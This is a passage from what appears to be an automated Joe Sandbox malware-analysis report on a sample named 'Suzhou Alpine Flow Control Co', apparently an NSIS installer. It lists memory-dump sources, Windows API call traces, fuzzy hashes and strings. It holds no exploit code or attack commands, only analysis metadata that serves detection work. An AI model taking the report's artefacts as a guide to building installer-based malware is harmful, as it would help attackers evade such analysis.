                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 3294113728-0
                                                                                                    • Opcode ID: 38bdd8529c47ea5edffceb92d72af5ec9064ba07a11341120463422747a5320d
                                                                                                    • Instruction ID: 760673b96d72cef8a70f9bf76d43f75bad9b7db283b6dfdc5a98cea5addec372
                                                                                                    • Opcode Fuzzy Hash: 38bdd8529c47ea5edffceb92d72af5ec9064ba07a11341120463422747a5320d
                                                                                                    • Instruction Fuzzy Hash: A631A072C00118BBDF11AFA5CE49DAF7E79EF05364F20423AF510762E1C6796E418BA9
                                                                                                    APIs
                                                                                                    • DestroyWindow.USER32(00000000,00000000), ref: 00402D35
                                                                                                    • GetTickCount.KERNEL32 ref: 00402D53
                                                                                                    • wsprintfW.USER32 ref: 00402D81
                                                                                                      • Part of subcall function 00405234: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nshE0D4.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040526C
                                                                                                      • Part of subcall function 00405234: lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nshE0D4.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040527C
                                                                                                      • Part of subcall function 00405234: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nshE0D4.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nshE0D4.tmp\System.dll,00000000,00000000,00000000), ref: 0040528F
                                                                                                      • Part of subcall function 00405234: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nshE0D4.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nshE0D4.tmp\System.dll), ref: 004052A1
                                                                                                      • Part of subcall function 00405234: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004052C7
                                                                                                      • Part of subcall function 00405234: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004052E1
                                                                                                      • Part of subcall function 00405234: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052EF
                                                                                                    • CreateDialogParamW.USER32(0000006F,00000000,00402C7F,00000000), ref: 00402DA5
                                                                                                    • ShowWindow.USER32(00000000,00000005), ref: 00402DB3
                                                                                                      • Part of subcall function 00402CFE: MulDiv.KERNEL32(00060113,00000064,0006168F), ref: 00402D13
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                    • String ID: ... %d%%
                                                                                                    • API String ID: 722711167-2449383134
                                                                                                    • Opcode ID: e27c2f7dbee131dbdfcdd41b567a98c3097ab4c9f03de6157def9e8d5b287b15
                                                                                                    • Instruction ID: 78f52ac4307216ae4daf114a653e214d9194ffd889c5bb91718f5c3abb157098
                                                                                                    • Opcode Fuzzy Hash: e27c2f7dbee131dbdfcdd41b567a98c3097ab4c9f03de6157def9e8d5b287b15
                                                                                                    • Instruction Fuzzy Hash: D1015E31909220EBC7616B64EE5DBDA3AA8AF00704B14457BF905B11F5C6B85C45CFAE
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404B19
                                                                                                    • GetMessagePos.USER32 ref: 00404B21
                                                                                                    • ScreenToClient.USER32(?,?), ref: 00404B3B
                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404B4D
                                                                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404B73
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$Send$ClientScreen
                                                                                                    • String ID: f
                                                                                                    • API String ID: 41195575-1993550816
                                                                                                    • Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                                                                    • Instruction ID: 7d165c7f7153624e3963f679d066e3c154625e4b871d361bb7407d5cf98d8b00
                                                                                                    • Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                                                                    • Instruction Fuzzy Hash: 97014C71D00219BADB00DB94DD85FFEBBBCAB59711F10412ABB10B71D0D7B4A9018BA5
                                                                                                    APIs
                                                                                                    • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402C9D
                                                                                                    • wsprintfW.USER32 ref: 00402CD1
                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00402CE1
                                                                                                    • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                                                    • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                    • API String ID: 1451636040-1158693248
                                                                                                    • Opcode ID: d7a3991d3a07419e7fab2ec9ad69e777b35ce877a0d2332f2df68b5c385b0569
                                                                                                    • Instruction ID: 1a6e545745197b7d5f0e024d91f0b7ce6738c211f373f8126abe8c19e9ad5020
                                                                                                    • Opcode Fuzzy Hash: d7a3991d3a07419e7fab2ec9ad69e777b35ce877a0d2332f2df68b5c385b0569
                                                                                                    • Instruction Fuzzy Hash: A6F03670504108BBEF205F50DD4ABEE3768FB00309F00843AFA16B51D1DBB95959DF59
                                                                                                    APIs
                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 10002416
                                                                                                      • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                                                                    • GlobalAlloc.KERNEL32(00000040), ref: 10002397
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2470562995.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2470483561.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2470605594.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2470633489.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_10000000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                    • String ID:
                                                                                                    • API String ID: 4216380887-0
                                                                                                    • Opcode ID: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                                                                    • Instruction ID: a8798eece1b67337def5fc6f06e905ed3cc6fca3e5836deafc22007a072d802d
                                                                                                    • Opcode Fuzzy Hash: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                                                                    • Instruction Fuzzy Hash: A14190B1508305EFF320DF24D885AAA77F8FB883D0F50452DF9468619ADB34AA54DB61
                                                                                                    APIs
                                                                                                      • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                    • GlobalFree.KERNEL32(?), ref: 10002572
                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 100025AD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2470562995.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2470483561.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2470605594.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2470633489.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_10000000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Global$Free$Alloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 1780285237-0
                                                                                                    • Opcode ID: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                                                                    • Instruction ID: 76257f5bf6759f365bfcd452de7d39bb0b2322773c3eba187a8a795e141f7608
                                                                                                    • Opcode Fuzzy Hash: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                                                                    • Instruction Fuzzy Hash: 6831DE71504A21EFF321CF14CCA8E2B7BF8FB853D2F114529FA40961A8CB319851DB69
                                                                                                    APIs
                                                                                                    • lstrlenW.KERNEL32(004226E8,004226E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A91
                                                                                                    • wsprintfW.USER32 ref: 00404A9A
                                                                                                    • SetDlgItemTextW.USER32(?,004226E8), ref: 00404AAD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                                                    • String ID: %u.%u%s%s$&B
                                                                                                    • API String ID: 3540041739-2907463167
                                                                                                    • Opcode ID: 9513d2e047af43577a24336e7432a2aba40062ca47d724a60bbce7168ae92968
                                                                                                    • Instruction ID: ab388700b69d78aa859054a1700c1a1d69e67ce61d201efd873ebc4ad7f6fd90
                                                                                                    • Opcode Fuzzy Hash: 9513d2e047af43577a24336e7432a2aba40062ca47d724a60bbce7168ae92968
                                                                                                    • Instruction Fuzzy Hash: 4F11D8736441282BDB00656D9C45E9F328DDB85334F154237FA25F71D1EA78CC2286E9
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2470562995.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2470483561.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2470605594.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2470633489.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_10000000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeGlobal
                                                                                                    • String ID:
                                                                                                    • API String ID: 2979337801-0
                                                                                                    • Opcode ID: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
                                                                                                    • Instruction ID: 56de187798276af1e94fdae5c91d23c4da0ac5596926d43ddda2a484f8c4ba85
                                                                                                    • Opcode Fuzzy Hash: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
                                                                                                    • Instruction Fuzzy Hash: 82511336E06115ABFB14DFA488908EEBBF5FF863D0F16406AE801B315DD6706F809792
                                                                                                    APIs
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                                                                    • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                                                                    • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2470562995.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2470483561.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2470605594.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2470633489.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_10000000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                    • String ID:
                                                                                                    • API String ID: 1148316912-0
                                                                                                    • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                    • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                                                                    • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                    • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                                                                    • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                                                                    • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                                                                    • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                                                                    • DeleteObject.GDI32(00000000), ref: 00401D36
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 1849352358-0
                                                                                                    • Opcode ID: cd135f4b73005082297d100c57be3cc5053262b6a7e6c2b6d53efd55afb7b6f5
                                                                                                    • Instruction ID: 421c968aeac85d0930bc76aa4bc7d64c85250730bd7c855cb2b2db6532b3540a
                                                                                                    • Opcode Fuzzy Hash: cd135f4b73005082297d100c57be3cc5053262b6a7e6c2b6d53efd55afb7b6f5
                                                                                                    • Instruction Fuzzy Hash: F9F0E1B2A04104BFDB01DBE4EE88DEEB7BCEB08305B104466F601F5190C674AD018B35
                                                                                                    APIs
                                                                                                    • GetDC.USER32(?), ref: 00401D44
                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                                                                    • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                                                                                    • CreateFontIndirectW.GDI32(0040BDA0), ref: 00401DBC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                    • String ID:
                                                                                                    • API String ID: 3808545654-0
                                                                                                    • Opcode ID: dc25ff1ab83189895f2e894faf43e64dd9f4cfc638364393878e19842c49e524
                                                                                                    • Instruction ID: 8995593179462595128303b368e9330df260c28bd2cead9704070f65c6b7920e
                                                                                                    • Opcode Fuzzy Hash: dc25ff1ab83189895f2e894faf43e64dd9f4cfc638364393878e19842c49e524
                                                                                                    • Instruction Fuzzy Hash: 1F016D71948285EFEB416BB0AE0AFDABF74EB65305F144479F201B62E2C77C10058B6E
                                                                                                    APIs
                                                                                                    • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                                                                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Timeout
                                                                                                    • String ID: !
                                                                                                    • API String ID: 1777923405-2657877971
                                                                                                    • Opcode ID: 9bf1345347551ad99251b033a374dd29c38f8ee43bbdf8c6824fc78253d04776
                                                                                                    • Instruction ID: bea79b3a0ece1bc6ad67d762bc59202c8df9b0d3ac543b92a9f7cfbf89d94624
                                                                                                    • Opcode Fuzzy Hash: 9bf1345347551ad99251b033a374dd29c38f8ee43bbdf8c6824fc78253d04776
                                                                                                    • Instruction Fuzzy Hash: 6B217471A44109BEDF019FB0C94AFAD7B75EF44748F20413AF502B61D1D6B8A941DB18
                                                                                                    APIs
                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000002,Call,?,004060CC,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E83
                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,004060CC,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405EA4
                                                                                                    • RegCloseKey.ADVAPI32(?,?,004060CC,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405EC7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                    • String ID: Call
                                                                                                    • API String ID: 3677997916-1824292864
                                                                                                    • Opcode ID: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
